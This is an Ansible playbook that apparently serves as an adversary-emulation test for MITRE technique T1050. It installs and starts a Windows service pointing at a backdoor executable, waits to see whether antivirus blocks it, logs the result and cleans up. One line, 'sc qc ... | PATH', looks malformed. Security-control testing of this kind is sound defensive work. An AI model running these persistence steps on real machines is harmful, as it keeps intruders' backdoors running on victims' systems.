# attack_technique: T1050
# Assuming your backdoor_exe is already downloaded on victim
- name: T1050 - New Service
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
  - name: create a new service
    tags: CMD
    win_command: |
      sc create {{ backdoor_svc_name }} binpath= "cmd /c {{ backdoor_exe }}"
  - name: start the new service
    tags: CMD
    win_command: |
      sc start {{ backdoor_svc_name }}
      
  - name: sleep for 10 seconds and continue with play to check if AV removed or Not
    tags: always
    wait_for: timeout=10
    delegate_to: localhost
    
  - name: Check if service create ok
    tags: CMD
    win_command: |
      sc qc {{ backdoor_svc_name }} | PATH
    register: T1050
  - name: check if playbook was blocked
    tags: CMD
    debug: msg="Playbook Completed#T1050#blocked#win#"
    when: backdoor_exe not in T1050.stdout   
  - name: check if playbook was successfull
    tags: CMD
    debug: msg="Playbook Completed#T1050#passed#win#"
    when: backdoor_exe in T1050.stdout   
   
  - name: cleanup PATH      
    tags: CMD
    win_command: |
        sc stop {{ backdoor_svc_name }}
        sc delete {{ backdoor_svc_name }}
    when: 'backdoor_exe in T1050.stdout'   
